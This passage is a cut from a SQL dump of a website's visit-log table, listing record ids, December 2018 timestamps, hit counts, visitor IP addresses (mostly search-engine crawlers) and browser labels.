,0,0,'54.36.148.252','other'),(348474,1544300340,1,1,0,0,'95.163.255.103','other'),(348475,1544300366,1,1,0,0,'95.163.255.105','other'),(348476,1544300395,1,1,0,0,'95.163.255.116','other'),(348477,1544300408,1,1,0,0,'54.36.148.101','other'),(348478,1544300428,1,1,0,0,'95.163.255.113','other'),(348479,1544300513,1,1,0,0,'54.36.148.231','other'),(348480,1544300521,1,1,0,0,'66.249.75.17','chrome'),(348481,1544300719,1,1,0,0,'54.36.148.58','other'),(348482,1544300733,2,2,0,0,'40.77.167.118','other'),(348483,1544301047,1,1,0,0,'95.163.255.178','other'),(348484,1544301049,1,1,0,0,'95.163.255.158','other'),(348485,1544301285,1,1,0,0,'66.249.75.22','chrome'),(348486,1544301691,1,1,0,0,'54.36.148.56','other'),(348487,1544301767,2,2,0,0,'66.249.75.20','chrome'),(348488,1544301962,1,1,0,0,'66.249.69.202','chrome'),(348489,1544302394,1,1,0,0,'66.249.75.16','chrome'),(348490,1544302550,1,1,0,0,'66.249.69.221','chrome'),(348491,1544302872,1,1,0,0,'66.249.75.15','chrome'),(348492,1544302883,1,1,0,0,'66.249.75.20','chrome'),(348493,1544302946,1,1,0,0,'66.249.75.17','chrome'),(348494,1544302987,3,3,0,0,'66.249.75.22','chrome'),(348495,1544303075,1,1,0,0,'54.36.148.52','other'),(348496,1544303297,1,1,0,0,'54.36.148.191','other'),(348497,1544303455,4,4,0,0,'66.249.75.21','chrome'),(348498,1544303562,1,1,0,0,'54.36.148.212','other'),(348499,1544303608,1,1,0,0,'54.36.149.79','other'),(348500,1544303760,1,1,0,0,'46.229.168.153','other'),(348501,1544304010,1,1,0,0,'66.249.75.16','chrome'),(348502,1544304052,1,1,0,0,'66.249.75.20','chrome'),(348503,1544304427,1,1,0,0,'54.36.148.117','other'),(348504,1544304476,1,1,0,0,'54.36.148.17','other'),(348505,1544304786,1,1,0,0,'54.36.149.88','other'),(348506,1544304808,1,1,0,0,'54.36.149.79','other'),(348507,1544304899,1,1,0,0,'207.46.13.220','other'),(348508,1544305133,1,1,0,0,'8.29.198.25','other'),(348509,1544305134,2,2,0,0,'141.170.226.112','firefox'),(348510,1544305165,1,1,0,0,'46.229.168.149','other'),(348511,1544305204,1,1,0,0,'46.229.168.152','other'),(348512,1544305208,1,1,0,0,'46.229.168.146','other'),(348513,1544305359,1,1,0,0,'46.229.168.136','other'),(348514,1544305528,1,1,0,0,'66.249.69.200','chrome'),(348515,1544305626,1,1,0,0,'66.249.75.20','chrome'),(348516,1544305882,1,1,0,0,'54.36.149.31','other'),(348517,1544305916,1,1,0,0,'66.249.75.21','chrome'),(348518,1544305999,1,1,0,0,'54.36.149.24','other'),(348519,1544306203,1,1,0,0,'207.46.13.220','other'),(348520,1544306513,1,1,0,0,'54.36.149.40','other'),(348521,1544306637,1,1,0,0,'54.36.148.62','other'),(348522,1544306867,1,1,0,0,'207.46.13.104','other'),(348523,1544306964,1,1,0,0,'66.249.69.204','chrome'),(348524,1544307091,2,2,0,0,'8.29.198.25','other'),(348525,1544307386,1,1,0,0,'66.249.75.16','chrome'),(348526,1544307415,1,1,0,0,'66.249.75.21','chrome'),(348527,1544307631,3,3,0,0,'66.249.75.22','chrome'),(348528,1544307746,1,1,0,0,'54.36.149.56','other'),(348529,1544307903,1,1,0,0,'46.229.168.143','other'),(348530,1544307924,2,2,0,0,'46.229.168.135','other'),(348531,1544308009,1,1,0,0,'66.249.75.20','chrome'),(348532,1544308226,1,1,0,0,'46.229.168.151','other'),(348533,1544308227,1,1,0,0,'54.36.148.163','other'),(348534,1544308368,1,1,0,0,'54.36.149.39','other'),(348535,1544308450,1,1,0,0,'66.249.75.21','chrome'),(348536,1544308930,1,1,0,0,'54.36.148.125','other'),(348537,1544308993,1,1,0,0,'37.9.113.20','other'),(348538,1544309048,2,2,0,0,'207.46.13.104','other'),(348539,1544309173,1,1,0,0,'213.180.203.9','other'),(348540,1544309178,1,1,0,0,'46.229.168.130','other'),(348541,1544309181,1,1,0,0,'46.229.168.133','other'),(348542,1544309258,1,1,0,0,'95.163.255.94','other'),(348543,1544309260,1,1,0,0,'95.163.255.92','other'),(348544,1544309294,2,2,0,0,'5.45.207.80','other'),(348545,1544309455,1,1,0,0,'54.36.148.82','other'),(348546,1544309656,1,1,0,0,'87.250.224.118','other'),(348547,1544309659,1,1,0,0,'213.180.203.48','other'),(348548,1544309664,1,1,0,0,'54.36.148.137','other'),(348549,1544309720,1,1,0,0,'46.229.168.132','other'),(348550,1544309883,1,1,0,0,'66.249.75.17','chrome'),(348551,1544309884,3,3,0,0,'66.249.75.20','chrome'),(348552,1544309935,1,1,0,0,'141.8.142.162','other'),(348553,1544309961,1,1,0,0,'46.229.168.144','other'),(348554,1544309965,1,1,0,0,'46.229.168.145','other'),(348555,1544310041,1,1,0,0,'54.36.149.30','other'),(348556,1544310203,1,1,0,0,'37.9.113.38','other'),(348557,1544310271,2,2,0,0,'66.249.75.16','chrome'),(348558,1544310274,5,5,0,0,'66.249.75.21','chrome'),(348559,1544310299,1,1,0,0,'54.36.148.136','other'),(348560,1544310342,1,1,0,0,'141.8.142.103','other'),(348561,1544310393,1,1,0,0,'54.36.148.231','other'),(348562,1544310448,1,1,0,0,'37.9.113.103','other'),(348563,1544310458,1,1,0,0,'5.45.207.8','other'),(348564,1544310476,1,1,0,0,'141.8.142.38','other'),(348565,1544310548,2,2,0,0,'5.45.207.79','other'),(348566,1544310557,1,1,0,0,'54.36.148.127','other'),(348567,1544310633,1,1,0,0,'178.154.244.21','other'),(348568,1544310661,1,1,0,0,'141.8.183.23','other'),(348569,1544310740,1,1,0,0,'66.249.69.204','chrome'),(348570,1544310790,1,1,0,0,'54.36.148.199','other'),(348571,1544310840,1,1,0,0,'5.45.207.80','other'),(348572,1544310876,1,1,0,0,'54.36.149.55','other'),(348573,1544310878,1,1,0,0,'54.36.149.75','other'),(348574,1544311175,1,1,0,0,'66.249.75.15','chrome'),(348575,1544311438,1,1,0,0,'54.36.149.30','other'),(348576,1544311484,1,1,0,0,'54.36.149.60','other'),(348577,1544311741,1,1,0,0,'178.154.244.11','other'),(348578,1544311956,1,1,0,0,'66.249.69.217','chrome'),(348579,1544311957,1,1,0,0,'66.249.69.200','chrome'),(348580,1544311973,1,1,0,0,'54.36.148.113','other'),(348581,1544311977,1,1,0,0,'66.249.75.17','chrome'),(348582,1544311978,1,1,0,0,'66.249.75.20','chrome'),(348583,1544312010,1,1,0,0,'54.36.148.46','other'),(348584,1544312118,1,1,0,0,'54.36.148.83','other'),(348585,1544312223,1,1,0,0,'66.249.75.16','chrome'),(348586,1544312224,1,1,0,0,'66.249.75.21','chrome'),(348587,1544312318,2,2,0,0,'46.229.168.153','other'),(348588,1544312535,1,1,0,0,'46.229.168.150','other'),(348589,1544312785,1,1,0,0,'54.36.148.92','other'),(348590,1544312811,1,1,0,0,'46.229.168.133','other'),(348591,1544313370,1,1,0,0,'54.36.149.32','other'),(348592,1544313450,3,3,0,0,'66.249.75.20','chrome'),(348593,1544313512,1,1,0,0,'46.211.68.30','chrome'),(348594,1544313816,1,1,0,0,'54.36.148.48','other'),(348595,1544314032,3,3,0,0,'66.249.75.21','chrome'),(348596,1544314072,1,1,0,0,'46.229.168.136','other'),(348597,1544314170,1,1,0,0,'66.249.75.22','chrome'),(348598,1544314183,1,1,0,0,'180.76.15.162','other'),(348599,1544314184,1,1,0,0,'180.76.15.7','other'),(348600,1544314241,1,1,0,0,'66.249.69.217','chrome'),(348601,1544314781,1,1,0,0,'95.163.255.98','other'),(348602,1544314784,1,1,0,0,'95.163.255.93','other'),(348603,1544314856,1,1,0,0,'46.229.168.134','other'),(348604,1544314860,1,1,0,0,'46.229.168.145','other'),(348605,1544314999,1,1,0,0,'54.36.149.98','other'),(348606,1544315205,1,1,0,0,'47.92.101.198','other'),(348607,1544315593,1,1,0,0,'54.36.149.17','other'),(348608,1544315886,2,2,0,0,'66.249.75.16','chrome'),(348609,1544315906,2,2,0,0,'66.249.75.21','chrome'),(348610,1544315962,1,1,0,0,'8.29.198.25','other'),(348611,1544316023,1,1,0,0,'66.249.75.17','chrome'),(348612,1544316025,1,1,0,0,'54.36.148.249','other'),(348613,1544316137,1,1,0,0,'46.229.168.135','other'),(348614,1544316183,1,1,0,0,'46.229.168.130','other'),(348615,1544316186,1,1,0,0,'46.229.168.149','other'),(348616,1544316274,1,1,0,0,'66.249.75.20','chrome'),(348617,1544316884,2,2,0,0,'66.249.75.16','chrome'),(348618,1544316895,1,1,0,0,'213.180.203.9','other'),(348619,1544316899,1,1,0,0,'54.36.148.157','other'),(348620,1544316932,1,1,0,0,'66.249.75.22','chrome'),(348621,1544317041,1,1,0,0,'54.36.148.137','other'),(348622,1544317335,1,1,0,0,'66.249.75.21','chrome'),(348623,1544317912,1,1,0,0,'46.229.168.133','other'),(348624,1544317932,2,2,0,0,'8.29.198.27','other'),(348625,1544318594,1,1,0,0,'46.229.168.147','other'),(348626,1544318619,1,1,0,0,'54.36.148.77','other'),(348627,1544318692,1,1,0,0,'46.229.168.150','other'),(348628,1544318871,1,1,0,0,'46.229.168.139','other'),(348629,1544319854,1,1,0,0,'66.249.75.22','chrome'),(348630,1544319962,1,1,0,0,'54.36.148.251','other'),(348631,1544319971,1,1,0,0,'54.36.149.17','other'),(348632,1544320010,1,1,0,0,'66.249.75.20','chrome'),(348633,1544320204,1,1,0,0,'46.229.168.136','other'),(348634,1544320772,1,1,0,0,'54.36.148.131','other'),(348635,1544320935,1,1,0,0,'66.249.75.16','chrome'),(348636,1544320936,2,2,0,0,'66.249.75.21','chrome'),(348637,1544321015,1,1,0,0,'66.249.69.204','chrome'),(348638,1544321376,1,1,0,0,'46.229.168.149','other'),(348639,1544321406,1,1,0,0,'54.36.149.103','other'),(348640,1544321533,3,3,0,0,'178.154.244.29','other'),(348642,1544321534,2,2,0,0,'5.45.207.79','other'),(348643,1544321583,1,1,0,0,'66.249.75.22','chrome'),(348644,1544321696,1,1,0,0,'54.36.148.169','other'),(348645,1544321731,1,1,0,0,'66.249.75.20','chrome'),(348646,1544322061,1,1,0,0,'54.36.148.222','other'),(348647,1544322503,3,3,0,0,'178.154.244.29','other'),(348648,1544322561,1,1,0,0,'54.36.148.71','other'),(348649,1544322685,2,2,0,0,'5.45.207.19','other'),(348650,1544322692,1,1,0,0,'66.249.75.16','chrome'),(348652,1544322818,1,1,0,0,'66.249.75.15','chrome'),(348653,1544322819,1,1,0,0,'66.249.75.22','chrome'),(348654,1544322858,1,1,0,0,'66.249.69.202','chrome'),(348655,1544323130,1,1,0,0,'178.154.244.11','other'),(348656,1544323464,2,2,0,0,'66.249.75.21','chrome'),(348657,1544323901,1,1,0,0,'46.229.168.151','other'),(348658,1544323904,1,1,0,0,'213.180.203.40','other'),(348659,1544324009,2,2,0,0,'91.209.11.236','other'),(348660,1544324234,1,1,0,0,'95.163.255.194','other'),(348661,1544324237,1,1,0,0,'95.163.255.170','other'),(348662,1544324260,1,1,0,0,'54.36.148.55','other'),(348663,1544324352,1,1,0,0,'54.36.149.84','other'),(348664,1544324475,2,2,0,0,'207.46.13.220','other'),(348665,1544324596,1,1,0,0,'66.249.75.20','chrome'),(348666,1544324744,1,1,0,0,'46.229.168.149','other'),(348667,1544324747,1,1,0,0,'46.229.168.153','other'),(348668,1544324955,2,2,0,0,'91.209.11.236','other'),(348669,1544325033,1,1,0,0,'54.36.148.255','other'),(348670,1544325112,1,1,0,0,'54.36.148.74','other'),(348671,1544325123,2,2,0,0,'207.46.13.104','other'),(348672,1544325292,1,1,0,0,'54.36.149.57','other'),(348673,1544325799,1,1,0,0,'46.229.168.147','other'),(348674,1544325829,2,2,0,0,'95.163.255.97','other'),(348675,1544325946,1,1,0,0,'54.36.148.254','other'),(348676,1544326063,1,1,0,0,'54.36.148.16','other'),(348677,1544326380,1,1,0,0,'54.36.148.81','other'),(348678,1544326429,1,1,0,0,'66.249.75.17','chrome'),(348679,1544326430,1,1,0,0,'66.249.75.21','chrome'),(348680,1544326697,1,1,0,0,'54.36.149.94','other'),(348681,1544326792,1,1,0,0,'8.29.198.26','other'),(348682,1544327120,1,1,0,0,'46.229.168.141','other'),(348683,1544327961,1,1,0,0,'54.36.148.31','other'),(348684,1544328246,1,1,0,0,'54.36.148.148','other'),(348685,1544328602,1,1,0,0,'54.36.148.74','other'),(348686,1544328707,1,1,0,0,'46.229.168.136','other'),(348687,1544328773,2,2,0,0,'8.29.198.25','other'),(348688,1544328782,1,1,0,0,'54.36.149.30','other'),(348689,1544328982,1,1,0,0,'157.55.39.172','other'),(348690,1544329443,1,1,0,0,'66.249.75.17','chrome'),(348691,1544329444,1,1,0,0,'66.249.75.22','chrome'),(348692,1544329518,1,1,0,0,'207.46.13.77','other'),(348693,1544329962,1,1,0,0,'46.229.168.135','other'),(348694,1544330171,1,1,0,0,'54.36.148.18','other'),(348695,1544330360,1,1,0,0,'66.249.75.15','chrome'),(348696,1544330361,1,1,0,0,'66.249.75.22','chrome'),(348697,1544330422,1,1,0,0,'95.163.255.182','other'),(348698,1544330424,1,1,0,0,'95.163.255.154','other'),(348699,1544330809,1,1,0,0,'54.36.148.120','other'),(348700,1544331098,1,1,0,0,'54.36.148.51','other'),(348701,1544331570,1,1,0,0,'54.36.149.20','other'),(348702,1544331576,1,1,0,0,'66.249.75.16','chrome'),(348703,1544331577,3,3,0,0,'66.249.75.20','chrome'),(348704,1544331820,1,1,0,0,'54.36.149.75','other'),(348705,1544331994,1,1,0,0,'54.36.148.164','other'),(348706,1544332155,1,1,0,0,'54.36.148.230','other'),(348707,1544332156,2,2,0,0,'66.249.75.22','chrome'),(348708,1544332406,1,1,0,0,'54.36.148.212','other'),(348709,1544332766,1,1,0,0,'91.196.178.38','chrome'),(348710,1544332935,1,1,0,0,'46.229.168.146','other'),(348711,1544333475,45,45,0,0,'69.30.210.242','other'),(348712,1544333583,1,1,0,0,'54.36.148.154','other'),(348713,1544333608,1,1,0,0,'78.37.41.24','chrome'),(348714,1544333673,1,1,0,0,'66.249.75.16','chrome'),(348716,1544334147,1,1,0,0,'178.154.244.11','other'),(348717,1544334158,1,1,0,0,'54.36.148.166','other'),(348718,1544334169,2,2,0,0,'141.8.142.103','other'),(348719,1544334342,1,1,0,0,'141.8.142.38','other'),(348720,1544334392,3,3,0,0,'69.30.210.242','other'),(348721,1544334470,1,1,0,0,'46.229.168.136','other'),(348722,1544334513,2,1,1,0,'66.249.75.20',''),(348723,1544334524,1,1,0,0,'54.36.148.209','other'),(348724,1544334616,1,1,0,0,'51.255.65.46','other'),(348725,1544334763,1,1,0,0,'141.8.142.108','other'),(348726,1544334784,4,4,0,0,'178.154.244.29','other'),(348727,1544334798,1,1,0,0,'54.36.148.205','other'),(348728,1544334812,1,0,1,0,'66.249.75.15',''),(348729,1544334930,1,1,0,0,'213.180.203.9','other'),(348730,1544335039,1,1,0,0,'5.45.207.79','other'),(348731,1544335164,1,1,0,0,'66.249.75.15','chrome'),(348732,1544335165,1,1,0,0,'66.249.75.20','chrome'),(348733,1544335282,1,1,0,0,'46.229.168.143','other'),(348734,1544335286,1,1,0,0,'46.229.168.133','other'),(348735,1544335425,1,1,0,0,'178.154.244.11','other'),(348736,1544335711,1,1,0,0,'178.154.244.29','other'),(348737,1544335762,1,1,0,0,'54.236.62.139','other'),(348738,1544336160,1,1,0,0,'66.249.75.16','chrome'),(348739,1544336187,1,1,0,0,'66.249.75.20','chrome'),(348740,1544336264,1,1,0,0,'54.36.148.74','other'),(348741,1544336350,1,1,0,0,'54.36.149.64','other'),(348742,1544336361,1,1,0,0,'54.36.148.43','other'),(348743,1544336856,1,1,0,0,'46.229.168.141','other'),(348744,1544336958,1,1,0,0,'46.211.49.74','chrome'),(348745,1544337010,1,1,0,0,'46.229.168.144','other'),(348746,1544337628,1,1,0,0,'8.29.198.27','other'),(348747,1544337754,1,1,0,0,'54.36.148.169','other'),(348748,1544337924,1,1,0,0,'54.36.149.66','other'),(348749,1544337970,2,2,0,0,'54.212.98.42','chrome'),(348750,1544338064,1,1,0,0,'54.36.148.190','other'),(348751,1544338650,1,1,0,0,'54.36.148.180','other'),(348752,1544339239,1,1,0,0,'46.229.168.137','other'),(348753,1544339431,1,1,0,0,'40.77.167.153','other'),(348754,1544339608,1,1,0,0,'46.229.168.140','other'),(348755,1544339610,1,1,0,0,'8.29.198.25','other'),(348756,1544339626,1,1,0,0,'8.29.198.27','other'),(348757,1544339713,2,2,0,0,'66.249.75.20','chrome'),(348758,1544340107,1,1,0,0,'66.249.75.15','chrome'),(348759,1544340108,1,1,0,0,'94.180.186.210','msie'),(348760,1544340346,1,1,0,0,'46.229.168.132','other'),(348761,1544340424,1,1,0,0,'54.36.148.60','other'),(348762,1544340556,1,1,0,0,'54.36.148.131','other'),(348763,1544340648,1,1,0,0,'54.36.149.104','other'),(348764,1544340802,1,1,0,0,'54.36.148.64','other'),(348765,1544341195,1,1,0,0,'66.249.69.144','chrome'),(348767,1544341688,1,1,0,0,'66.249.69.202','chrome'),(348768,1544342037,1,1,0,0,'46.229.168.132','other'),(348769,1544342156,1,1,0,0,'54.36.149.73','other'),(348770,1544342475,1,1,0,0,'54.36.148.240','other'),(348771,1544342740,1,1,0,0,'46.229.168.140','other'),(348772,1544342919,1,1,0,0,'91.196.178.89','chrome'),(348773,1544343081,1,1,0,0,'46.229.168.137','other'),(348774,1544343318,1,1,0,0,'66.249.69.145','chrome'),(348775,1544343319,1,1,0,0,'66.249.69.150','chrome'),(348776,1544343370,1,1,0,0,'54.36.149.41','other'),(348777,1544343408,1,1,0,0,'54.36.148.26','other'),(348778,1544343782,1,1,0,0,'54.36.149.50','other'),(348779,1544344101,1,1,0,0,'54.36.149.101','other'),(348780,1544344370,1,1,0,0,'46.229.168.147','other'),(348781,1544344527,1,1,0,0,'54.36.148.208','other'),(348782,1544344935,1,1,0,0,'180.76.15.14','other'),(348783,1544345011,1,1,0,0,'54.36.149.90','other'),(348784,1544345609,1,1,0,0,'54.36.149.67','other'),(348785,1544345781,1,1,0,0,'157.55.39.255','other'),(348786,1544345804,1,1,0,0,'66.249.69.148','chrome'),(348787,1544345870,1,1,0,0,'46.229.168.151','other'),(348788,1544346420,1,1,0,0,'46.229.168.141','other'),(348789,1544346424,1,1,0,0,'46.229.168.152','other'),(348790,1544346452,1,1,0,0,'46.229.168.133','other'),(348791,1544346455,1,1,0,0,'46.229.168.154','other'),(348792,1544346750,2,2,0,0,'66.249.69.148','chrome'),(348793,1544346790,2,2,0,0,'52.53.201.78','chrome'),(348794,1544346937,1,1,0,0,'46.229.168.147','other'),(348795,1544347104,1,1,0,0,'54.36.148.206','other'),(348796,1544347323,1,1,0,0,'54.36.148.193','other'),(348797,1544347958,1,1,0,0,'54.36.148.200','other'),(348798,1544348454,1,1,0,0,'66.249.69.150','chrome'),(348799,1544348465,1,1,0,0,'8.29.198.26','other'),(348800,1544348615,1,1,0,0,'66.249.69.149','chrome'),(348801,1544349154,1,1,0,0,'54.36.148.15','other'),(348802,1544349735,1,1,0,0,'54.36.148.23','other'),(348803,1544349822,1,1,0,0,'54.36.148.18','other'),(348804,1544350239,1,1,0,0,'46.229.168.142','other'),(348805,1544350243,1,1,0,0,'46.229.168.152','other'),(348806,1544350283,1,1,0,0,'5.45.207.79','other'),(348807,1544350444,1,1,0,0,'8.29.198.25','other'),(348808,1544350453,1,1,0,0,'8.29.198.27','other'),(348809,1544350649,1,1,0,0,'54.36.149.83','other'),(348810,1544351903,2,2,0,0,'178.154.244.11','other'),(348811,1544351904,1,1,0,0,'95.108.213.4','other'),(348812,1544351907,1,1,0,0,'178.154.244.29','other'),(348813,1544352032,1,1,0,0,'54.36.148.176','other'),(348814,1544352036,1,1,0,0,'66.249.69.143','chrome'),(348815,1544352037,1,1,0,0,'66.249.69.150','chrome'),(348816,1544352512,1,1,0,0,'54.36.148.227','other'),(348817,1544352661,1,1,0,0,'54.36.149.93','other'),(348818,1544352984,1,1,0,0,'54.36.148.238','other'),(348819,1544353074,1,1,0,0,'178.154.244.29','other'),(348820,1544353118,1,1,0,0,'66.249.69.200','chrome'),(348821,1544353199,1,1,0,0,'54.36.148.84','other'),(348822,1544353206,1,1,0,0,'54.36.148.30','other'),(348823,1544354161,1,1,0,0,'46.229.168.139','other'),(348824,1544354653,2,2,0,0,'66.249.69.148','chrome'),(348825,1544354894,1,1,0,0,'37.55.174.139','chrome'),(348826,1544354900,1,1,0,0,'54.36.148.221','other'),(348827,1544354964,1,1,0,0,'54.36.148.84','other'),(348828,1544355197,1,1,0,0,'54.36.148.36','other'),(348829,1544355481,1,1,0,0,'54.36.148.115','other'),(348830,1544355721,1,1,0,0,'46.229.168.132','other'),(348831,1544355940,1,1,0,0,'207.46.13.58','other'),(348832,1544356001,1,1,0,0,'66.249.69.145','chrome'),(348834,1544356012,2,2,0,0,'46.229.168.147','other'),(348835,1544356015,1,1,0,0,'46.229.168.142','other'),(348836,1544357065,1,1,0,0,'40.77.167.20','other'),(348837,1544357067,1,1,0,0,'54.36.148.163','other'),(348838,1544357197,1,1,0,0,'54.36.149.87','other'),(348839,1544357205,1,1,0,0,'66.249.75.22','chrome'),(348840,1544357258,1,1,0,0,'54.36.149.45','other'),(348841,1544357318,1,1,0,0,'66.249.69.144','chrome'),(348842,1544357319,1,1,0,0,'66.249.69.149','chrome'),(348843,1544357361,1,1,0,0,'66.249.75.21','chrome'),(348844,1544357392,1,1,0,0,'37.55.233.198','msie'),(348845,1544357517,1,1,0,0,'54.36.148.208','other'),(348846,1544357817,1,1,0,0,'37.73.254.133','chrome'),(348847,1544358049,3,3,0,0,'66.249.69.204','chrome'),(348848,1544358170,1,1,0,0,'66.249.75.15','chrome'),(348849,1544358191,1,1,0,0,'66.249.75.20','chrome'),(348850,1544358228,1,1,0,0,'46.229.168.137','other'),(348851,1544358231,1,1,0,0,'46.229.168.148','other'),(348852,1544358291,1,1,0,0,'54.36.148.83','other'),(348853,1544358298,1,1,0,0,'66.249.69.200','chrome'),(348854,1544358631,1,1,0,0,'46.229.168.144','other'),(348855,1544358940,1,1,0,0,'46.229.168.135','other'),(348856,1544358944,1,1,0,0,'46.229.168.130','other'),(348857,1544359151,1,1,0,0,'54.36.148.189','other'),(348858,1544359245,1,1,0,0,'54.36.149.88','other'),(348859,1544359307,1,1,0,0,'8.29.198.25','other'),(348860,1544359551,3,3,0,0,'66.249.75.20','chrome'),(348861,1544359665,1,1,0,0,'46.229.168.134','other'),(348862,1544359984,1,1,0,0,'66.249.75.16','chrome'),(348864,1544360000,1,1,0,0,'54.36.148.126','other'),(348865,1544360085,2,2,0,0,'91.196.178.130','firefox'),(348866,1544360165,1,1,0,0,'207.46.13.58','other'),(348867,1544360184,2,2,0,0,'66.249.75.21','chrome'),(348868,1544360236,1,1,0,0,'54.36.149.91','other'),(348869,1544360465,1,1,0,0,'66.249.69.202','chrome'),(348870,1544360546,2,2,0,0,'66.249.75.20','chrome'),(348871,1544360584,2,2,0,0,'66.249.75.22','chrome'),(348872,1544360743,1,1,0,0,'66.249.69.200','chrome'),(348873,1544360955,2,2,0,0,'66.249.75.15','chrome'),(348874,1544360958,1,1,0,0,'54.36.148.77','other'),(348875,1544361275,2,2,0,0,'8.29.198.25','other'),(348876,1544361364,1,1,0,0,'66.249.75.16','chrome'),(348877,1544361366,3,3,0,0,'66.249.75.21','chrome'),(348878,1544361553,1,1,0,0,'207.46.13.151','other'),(348879,1544361792,1,1,0,0,'66.249.69.204','chrome'),(348880,1544361879,1,1,0,0,'66.249.69.200','chrome'),(348881,1544361965,1,1,0,0,'66.249.75.15','chrome'),(348882,1544362516,1,1,0,0,'66.249.75.22','chrome'),(348883,1544362637,1,1,0,0,'207.46.13.58','other'),(348884,1544362957,1,1,0,0,'78.154.174.38','firefox'),(348885,1544362958,1,1,0,0,'78.154.174.38','firefox'),(348886,1544363348,1,1,0,0,'46.229.168.132','other'),(348887,1544363594,1,1,0,0,'66.249.75.22','chrome'),(348888,1544363806,1,1,0,0,'66.249.75.21','chrome'),(348889,1544363837,1,1,0,0,'37.9.113.20','other'),(348890,1544363885,1,1,0,0,'66.249.69.200','chrome'),(348891,1544363896,1,1,0,0,'66.249.69.202','chrome'),(348892,1544363960,1,1,0,0,'66.249.75.17','chrome'),(348893,1544363963,1,1,0,0,'66.249.75.20','chrome'),(348894,1544363993,1,1,0,0,'54.165.59.7','other'),(348895,1544364154,1,1,0,0,'176.113.170.104','chrome'),(348896,1544364286,1,1,0,0,'54.36.149.24','other'),(348897,1544364384,1,1,0,0,'95.108.213.4','other'),(348898,1544364562,1,1,0,0,'91.196.178.131','chrome'),(348899,1544364873,1,1,0,0,'141.8.142.103','other'),(348900,1544364951,1,1,0,0,'54.36.148.214','other'),(348901,1544365417,1,1,0,0,'207.46.13.58','other'),(348902,1544365948,2,2,0,0,'66.249.75.17','chrome'),(348903,1544365977,2,2,0,0,'66.249.75.20','chrome'),(348904,1544366037,2,2,0,0,'66.249.75.22','chrome'),(348905,1544366212,1,1,0,0,'178.154.244.29','other'),(348906,1544366222,2,2,0,0,'40.77.167.20','other'),(348907,1544366229,1,1,0,0,'46.229.168.133','other'),(348908,1544366555,1,1,0,0,'178.154.244.11','other'),(348909,1544366600,1,1,0,0,'37.9.113.148','other'),(348910,1544366704,1,1,0,0,'66.249.75.15','chrome'),(348911,1544366706,1,1,0,0,'66.249.69.204','chrome'),(348912,1544366729,2,2,0,0,'66.249.75.21','chrome'),(348913,1544367039,1,1,0,0,'54.36.148.95','other'),(348914,1544367560,1,1,0,0,'66.249.69.200','chrome'),(348915,1544367612,1,1,0,0,'54.36.149.84','other'),(348916,1544367658,2,2,0,0,'94.179.246.96','firefox'),(348917,1544367748,1,1,0,0,'95.163.255.97','other'),(348918,1544367753,1,1,0,0,'95.163.255.95','other'),(348919,1544368211,1,1,0,0,'46.229.168.152','other'),(348920,1544368212,1,1,0,0,'46.229.168.139','other'),(348921,1544368280,1,1,0,0,'54.36.148.169','other'),(348922,1544368640,4,4,0,0,'46.211.125.205','chrome'),(348923,1544368653,1,1,0,0,'95.108.213.4','other'),(348924,1544368668,1,1,0,0,'94.179.246.96','firefox'),(348925,1544368983,1,1,0,0,'54.36.148.235','other'),(348926,1544369243,1,1,0,0,'5.248.166.53','chrome'),(348927,1544369548,1,1,0,0,'54.36.149.101','other'),(348928,1544369922,1,1,0,0,'95.163.255.105','other'),(348929,1544369932,3,3,0,0,'95.163.255.106','other'),(348930,1544369944,3,3,0,0,'95.163.255.115','other'),(348931,1544369957,3,3,0,0,'95.163.255.102','other'),(348932,1544369985,2,2,0,0,'95.163.255.119','other'),(348933,1544369999,1,1,0,0,'95.163.255.112','other'),(348934,1544370113,1,1,0,0,'95.163.255.104','other'),(348935,1544370131,1,1,0,0,'8.29.198.27','other'),(348936,1544370246,1,1,0,0,'46.229.168.141','other'),(348937,1544370250,1,1,0,0,'46.229.168.154','other'),(348938,1544370339,1,1,0,0,'54.36.148.69','other'),(348939,1544370569,1,1,0,0,'54.36.148.143','other'),(348940,1544370636,1,1,0,0,'40.77.167.20','other'),(348941,1544371022,1,1,0,0,'95.163.255.119','other'),(348942,1544371040,1,1,0,0,'54.36.148.240','other'),(348944,1544371052,1,1,0,0,'95.163.255.114','other'),(348945,1544371067,1,1,0,0,'95.163.255.117','other'),(348946,1544371098,1,1,0,0,'66.249.69.204','chrome'),(348947,1544371166,1,1,0,0,'40.77.167.205','other'),(348948,1544371891,1,1,0,0,'66.249.75.17','chrome'),(348949,1544371920,1,1,0,0,'66.249.75.20','chrome'),(348950,1544371999,1,1,0,0,'178.154.244.29','other'),(348951,1544372091,1,1,0,0,'66.249.75.21','chrome'),(348952,1544372106,1,1,0,0,'8.29.198.26','other'),(348953,1544372115,1,1,0,0,'8.29.198.25','other'),(348954,1544372290,1,1,0,0,'207.46.13.212','other'),(348955,1544372889,1,1,0,0,'46.229.168.151','other'),(348956,1544372952,1,1,0,0,'54.36.148.203','other'),(348957,1544373100,2,2,0,0,'37.53.122.167','chrome'),(348958,1544373158,1,1,0,0,'54.36.148.123','other'),(348959,1544373259,2,2,0,0,'192.162.114.2','other'),(348960,1544373368,1,1,0,0,'66.249.69.202','chrome'),(348961,1544373697,1,1,0,0,'54.36.148.54','other'),(348962,1544373744,1,1,0,0,'46.229.168.137','other'),(348963,1544373810,1,1,0,0,'54.36.148.18','other'),(348964,1544373892,1,1,0,0,'40.77.167.20','other'),(348965,1544374010,1,1,0,0,'91.196.178.189','chrome'),(348966,1544374101,2,2,0,0,'95.163.255.69','other'),(348967,1544374133,1,1,0,0,'46.229.168.136','other'),(348968,1544374143,1,1,0,0,'54.36.148.168','other'),(348969,1544374304,1,1,0,0,'180.76.15.26','other'),(348970,1544374424,1,1,0,0,'54.36.148.130','other'),(348971,1544375095,1,1,0,0,'95.163.255.62','other'),(348972,1544375097,1,1,0,0,'95.163.255.65','other'),(348973,1544375717,1,1,0,0,'54.36.149.35','other'),(348974,1544375751,1,1,0,0,'95.163.255.104','other'),(348975,1544376100,2,2,0,0,'46.229.168.137','other'),(348977,1544376477,1,1,0,0,'178.154.244.11','other'),(348978,1544376833,1,1,0,0,'95.108.213.4','other'),(348979,1544376860,1,1,0,0,'91.196.178.103','chrome'),(348980,1544376877,1,1,0,0,'46.229.168.141','other'),(348981,1544376980,1,1,0,0,'37.9.113.148','other'),(348982,1544377082,1,1,0,0,'85.91.199.96','msie'),(348983,1544377085,1,1,0,0,'54.36.149.100','other'),(348984,1544377874,1,1,0,0,'66.249.75.22','chrome'),(348985,1544377924,2,2,0,0,'66.249.75.20','chrome'),(348986,1544378370,2,2,0,0,'91.196.178.103','chrome'),(348987,1544378386,1,1,0,0,'54.36.149.26','other'),(348988,